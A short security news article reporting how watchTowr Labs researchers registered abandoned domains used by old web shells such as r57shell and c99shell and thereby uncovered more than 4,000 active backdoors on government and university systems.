Backdoor in backdoors

13 January 2025 2 minutes Author: Newsman

Researchers at watchTowr Labs discovered more than 4,000 active backdoors on compromised systems of governments and universities around the world, using abandoned domains and abandoned infrastructure.

The watchTowr Labs team conducted extensive research focusing on the use of abandoned domains that were part of backdoors on hackers’ systems. The idea was to take control of abandoned backdoors through which hackers gained access to compromised systems. For this, the researchers registered more than 40 abandoned domains that were used in old web shells to communicate with attackers.

After registering domains and redirecting traffic to their servers, the researchers discovered more than 4,000 active backdoors on various systems, including:

  • Government institutions in China, Bangladesh and Nigeria
  • Universities of Thailand, South Korea and China

In addition, the team obtained data on the use of old popular web shells such as r57shell and c99shell, which had built-in backdoors to “control hackers by hackers”. The identified backdoors allowed to observe how the hackers infect the systems on their own, and also made it possible to gain access to these systems with minimal effort.

A similar technique has been used before, when the watchTowr team conducted research on domain swapping for .MOBI domains, which allowed them to obtain trusted TLS/SSL certificates. This led to global changes in approaches to issuing certificates initiated by Google.

Webshells such as r57shell and c99shell have historically been widely used by hackers and cybercriminals for follow-up attacks after the initial breach of servers. They often had hidden backdoors that allowed web shell writers to gain access to compromised systems even if the original hacker had password-protected the backdoor.

The watchTowr Labs study highlights the dangers of abandoned infrastructure and abandoned domains that can be used to control compromised systems. The company encourages organizations to regularly review their assets and ensure their security.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.